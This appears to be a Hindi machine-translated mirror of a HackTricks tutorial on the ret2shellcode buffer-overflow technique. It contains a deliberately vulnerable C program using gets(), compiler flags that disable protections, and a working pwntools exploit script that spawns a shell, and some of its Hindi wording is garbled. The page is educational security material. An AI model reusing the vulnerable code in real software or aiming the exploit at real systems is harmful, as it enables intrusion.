mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
93 lines
9 KiB
Markdown
93 lines
9 KiB
Markdown
# Ret2Shellcode
|
|
|
|
<details>
|
|
|
|
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
|
|
|
HackTricks का समर्थन करने के अन्य तरीके:
|
|
|
|
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
|
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
|
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
|
|
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
|
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
|
|
|
</details>
|
|
|
|
## मूल जानकारी
|
|
|
|
**Ret2shellcode** एक तकनीक है जो बाइनरी उत्पीड़न में उपयोग की जाती है जहां हमलावता एक वंशावली कार्यक्रम की स्टैक में शेलकोड लिखता है और फिर **इंस्ट्रक्शन पॉइंटर (IP)** या **विस्तारित इंस्ट्रक्शन पॉइंटर (EIP)** को इस शेलकोड के स्थान पर पॉइंट करने के लिए संशोधित करता है, जिससे यह निषेधाज्ञा प्राप्त करने या लक्षित प्रणाली पर अनधिकृत पहुंचने के लिए प्रयोग किया जाता है। यह एक क्लासिक विधि है जो एक लक्षित प्रणाली पर अनधिकृत पहुंचने या विचित्र आदेशों को क्रियान्वित करने के लिए उपयोग की जाती है। यहां प्रक्रिया का विवरण है, जिसमें एक सरल सी उदाहरण और आपको दिखाया गया है कि आप किस प्रकार से **pwntools** का उपयोग करके पायथन का उपयुक्त शोध लिख सकते हैं।
|
|
|
|
### सी उदाहरण: एक वंशावली कार्यक्रम
|
|
|
|
चलो एक वंशावली सी कार्यक्रम का एक सरल उदाहरण से शुरू करते हैं:
|
|
```c
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
void vulnerable_function() {
|
|
char buffer[64];
|
|
gets(buffer); // Unsafe function that does not check for buffer overflow
|
|
}
|
|
|
|
int main() {
|
|
vulnerable_function();
|
|
printf("Returned safely\n");
|
|
return 0;
|
|
}
|
|
```
|
|
यह प्रोग्राम `gets()` फ़ंक्शन का उपयोग करने के कारण एक बफर ओवरफ़्लो के लिए वंर्नरबल है।
|
|
|
|
### Compilation
|
|
|
|
इस प्रोग्राम को कंपाइल करने के लिए विभिन्न सुरक्षा सुरक्षा को अक्षम करते हुए (एक वंर्नरबल वातावरण का अनुकरण करने के लिए), आप निम्नलिखित कमांड का उपयोग कर सकते हैं:
|
|
```sh
|
|
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
|
|
```
|
|
* `-fno-stack-protector`: स्टैक सुरक्षा को अक्षम करता है।
|
|
* `-z execstack`: स्टैक को क्रियाशील बनाता है, जो स्टैक पर संग्रहीत शेलकोड को निष्पादित करने के लिए आवश्यक है।
|
|
* `-no-pie`: पोजीशन इंडिपेंडेंट एक्जीक्यूटेबल को अक्षम करता है, जिससे हमारे शेलकोड का स्थान जिसमें होगा उसकी स्मृति पता लगाना आसान हो जाता है।
|
|
* `-m32`: कार्यक्रम को 32-बिट एक्जीक्यूटेबल के रूप में कंपाइल करता है, अक्सर उत्पीडन विकास में सरलता के लिए प्रयोग किया जाता है।
|
|
|
|
### Pwntools का उपयोग करके Python Exploit
|
|
|
|
यहाँ एक उदाहरण है कि आप **pwntools** का उपयोग करके Python में एक उत्पीडन लिख सकते हैं जो एक **ret2shellcode** हमला करने के लिए है:
|
|
```python
|
|
from pwn import *
|
|
|
|
# Set up the process and context
|
|
binary_path = './vulnerable'
|
|
p = process(binary_path)
|
|
context.binary = binary_path
|
|
context.arch = 'i386' # Specify the architecture
|
|
|
|
# Generate the shellcode
|
|
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell
|
|
|
|
# Find the offset to EIP
|
|
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash
|
|
|
|
# Prepare the payload
|
|
# The NOP slide helps to ensure that the execution flow hits the shellcode.
|
|
nop_slide = asm('nop') * (offset - len(shellcode))
|
|
payload = nop_slide + shellcode
|
|
payload += b'A' * (offset - len(payload)) # Adjust the payload size to exactly fill the buffer and overwrite EIP
|
|
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide
|
|
|
|
# Send the payload
|
|
p.sendline(payload)
|
|
p.interactive()
|
|
```
|
|
यह स्क्रिप्ट एक **NOP स्लाइड**, **शेलकोड**, और फिर **EIP** को नया अड्रेस देकर पुनः लिखता है जिससे शेलकोड को निष्पादित किया जाता है।
|
|
|
|
**NOP स्लाइड** (`asm('nop')`) का उपयोग किया जाता है ताकि निष्पादन का अवश्यता के बावजूद हमारे शेलकोड में "स्लाइड" हो सके। `p32()` तर्क को अपने बफर के प्रारंभिक पते पर एक ओफ़्सेट के साथ समायोजित करें ताकि NOP स्लाइड में लैंड हो सके।
|
|
|
|
## सुरक्षा
|
|
|
|
* [**ASLR**](../common-binary-protections/aslr.md) को निष्क्रिय कर देना चाहिए ताकि पता स्थिर रहे कि क्रियान्वयन के लिए पता सभी क्रियान्वयनों के बीच स्थिर रहे या फ़ंक्शन को स्थानित किया जाएगा वहाँ हमेशा समान नहीं होगा और आपको कुछ लीक की आवश्यकता होगी ताकि पता चले कि जीत फ़ंक्शन को कहाँ लोड किया गया है।
|
|
* [**स्टैक कैनेरीज़**](../common-binary-protections/stack-canaries.md) भी निष्क्रिय कर देना चाहिए अन्यथा क्षतिग्रस्त EIP वापसी पता कभी भी अनुसरण नहीं किया जाएगा।
|
|
* [**NX**](../common-binary-protections/no-exec-nx.md) **स्टैक** सुरक्षा शेलकोड का निष्पादन स्टैक के अंदर रोकेगी क्योंकि उस क्षेत्र को क्रियात्मक नहीं किया जाएगा।
|
|
|
|
## अन्य उदाहरण
|
|
|
|
* [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
|